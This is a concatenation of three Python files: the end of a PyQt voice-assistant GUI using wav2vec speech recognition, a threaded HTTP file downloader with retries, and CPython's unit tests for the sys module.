""" Converts the current buffer into numpy array and gets a transcription from
the currently loaded model."""
self._get_np_buffer()
return self.wav2vec_inference.buffer_to_text(self.np_buffer).lower()
def _transcribe_custom_length_buffer_audio(self, buffer) -> str:
numpy_buffer = np.frombuffer(b''.join(buffer), dtype=NUMPY_DATATYPE) / 32767
return self.wav2vec_inference.buffer_to_text(numpy_buffer).lower()
def _transcribe_and_print_buffer_audio(self) -> None:
""" Transcribes audio based on the given model."""
self.transcribed_text = self._transcribe_buffer_audio()
if self.transcribed_text:
self.output_label.append(self.transcribed_text)
else:
self.output_label.append("Please try again.")
self.output_label.moveCursor(QtGui.QTextCursor.End)
    def _update_threads(self):
        """ Cleans up the list of threads by joining and removing stopped threads.
        Rebuilds the list instead of deleting entries while iterating over it,
        which would otherwise skip elements."""
        alive_threads = []
        for thread in self.threads:
            if thread.is_alive():
                alive_threads.append(thread)
            else:
                thread.join()
        self.threads = alive_threads
def about(self) -> None:
"""This function takes care of the about dialog."""
about_dialog = FramelessMessageDialog(self,
"Created by Hannan Khan, Salman Nazir,\nReza Mohideen, and Ali "
"Abdul-Hameed.",
self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color,
self.highlight_color, self.close_button_label_highlight_bg,
self.close_button_label_highlight_color, "About",
QFont(self.lato_font_family, 15))
github_label = QtWidgets.QLabel()
github_label.setFont(self.current_font)
github_label.setText(
'<a href="https://github.com/hannankhan888/SimpleDigitalAssistant" style="color: rgba(187, 172, 193, '
'255)">Github</a>')
github_label.setOpenExternalLinks(True)
license_label = CustomButton(self.license, self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color)
license_label.setFont(self.current_font)
license_label.setText("License")
license_label.setCursor(Qt.PointingHandCursor)
about_dialog.middle_frame_layout.addWidget(github_label)
about_dialog.middle_frame_layout.addWidget(license_label)
about_dialog.exec_()
def settings_dialog(self) -> None:
# we have to stop the listening for max thread as it is using the self.stream obj.
self.listening_for_max = False
self._update_threads()
settings_dialog = FramelessSettingsDialog(self, "", self.normal_bg,
self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color,
self.close_button_label_highlight_bg,
self.close_button_label_highlight_color,
"Settings", QFont(self.lato_font_family, 12),
self.input_device_name, self.output_device_name)
result = settings_dialog.exec_()
# Ready == 0
# Speaking == 1
# Paused == 2
# BackEnd Error == 3
if self.speech.state() == 1:
self.speech.stop()
self._init_sound_devices()
# start up listen for max thread again, since we closed it in init sound devices
self.start_listening_for_max_thread()
def license(self) -> None:
""" This function makes a scrollable license dialog."""
license_str = """
MIT License
Copyright (c) 2021 Hannan, Salman, Reza, Ali
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE."""
license_dialog = FramelessScrollableMessageDialog(self, license_str, self.normal_bg,
self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color,
self.close_button_label_highlight_bg,
self.close_button_label_highlight_color, "License",
QFont(self.lato_font_family, 12))
license_dialog.exec_()
def minimize_app(self) -> None:
self.showMinimized()
def _set_vars_to_false(self):
""" Sets all vars that run threads to false."""
self.recording = False
self.listening_for_max = False
self.should_take_action = False
def _close_connections(self):
""" Closes all connections started by this app."""
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
def _dirty_exit_app(self):
""" Exits the app in a dirty way. This function is called from the background
action_thread. It uses a global variable QApplication to cause the whole
application to quit at once. This means the threads are not joined in a proper
manner, and cannot be, since a sub-thread is called this function."""
self._set_vars_to_false()
self._close_connections()
QApplication.quit()
def clean_exit_app(self) -> None:
""" Cleanly exits the app by setting all vars to false (thereby stopping all threads),
joining all threads that are not stopped yet. Then closing all connections opened
by this app before exiting."""
self._set_vars_to_false()
for thread in self.threads:
thread.join()
self._close_connections()
sys.exit(0)
def main():
app = QApplication(sys.argv)
desktop = app.desktop()
gui = RootWindow(model_name="jonatasgrosman/wav2vec2-large-english")
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
downloader.py
|
import logging, requests, requests.adapters, queue, threading, os, random, time
def download_retry(requests_session, url, retry_num=1, max_retries=5):
try:
return requests_session.get(url).content
except Exception:
logging.exception("Exception downloading from url {}".format(url))
if max_retries is None:
raise
elif retry_num > max_retries:
logging.info("attempt {} failed, giving up".format(retry_num))
raise
else:
sleep_time = random.choice(range(20,50))
logging.info("attempt {} failed, sleeping {} seconds and retrying".format(retry_num, sleep_time))
time.sleep(sleep_time)
        # propagate max_retries so an explicit value (or None) is not reset to the default
        return download_retry(requests_session, url, retry_num+1, max_retries)
def start_downloader(poolsize, numthreads, worker=None, max_retries=None):
session = requests.session()
session.mount("http://", requests.adapters.HTTPAdapter(pool_connections=poolsize, pool_maxsize=poolsize))
session.mount("https://", requests.adapters.HTTPAdapter(pool_connections=poolsize, pool_maxsize=poolsize))
q = queue.Queue()
threads = []
def thread_worker():
while True:
item = q.get()
if item is None:
break
# if worker callback is provided, it must return True to override the default functionality
if not worker or not worker(item, session):
url, filepath = item
if not os.path.exists(filepath):
logging.info("Downloading {} -> {}".format(url, filepath))
os.makedirs(os.path.dirname(filepath), exist_ok=True)
with open(filepath, "wb") as f:
content = download_retry(session, url, max_retries=max_retries)
f.write(content)
q.task_done()
for i in range(numthreads):
t = threading.Thread(target=thread_worker)
t.start()
threads.append(t)
return q, threads
def stop_downloader(worker_queue, threads, numthreads):
# block until all tasks are done
worker_queue.join()
# stop workers
for i in range(numthreads):
worker_queue.put(None)
for t in threads:
t.join()
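# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): it shows how the
# queue returned by start_downloader() is fed with (url, filepath) work items
# and how a custom worker callback can take over an item by returning True,
# which skips the default download-to-file logic in thread_worker().
# The URLs, file paths, and the ".tmp" skip rule below are hypothetical
# placeholders, not behaviour defined elsewhere in this module.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    def skip_tmp_worker(item, session):
        # Returning True tells thread_worker() the item was handled here.
        url, filepath = item
        if filepath.endswith(".tmp"):
            logging.info("skipping temporary target %s", filepath)
            return True
        return False

    num_threads = 4
    work_queue, workers = start_downloader(poolsize=num_threads,
                                           numthreads=num_threads,
                                           worker=skip_tmp_worker,
                                           max_retries=3)
    work_queue.put(("https://example.com/data.bin", "downloads/data.bin"))
    work_queue.put(("https://example.com/scratch.bin", "downloads/scratch.tmp"))
    stop_downloader(work_queue, workers, num_threads)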
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
        # an empty encoding or error handler has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
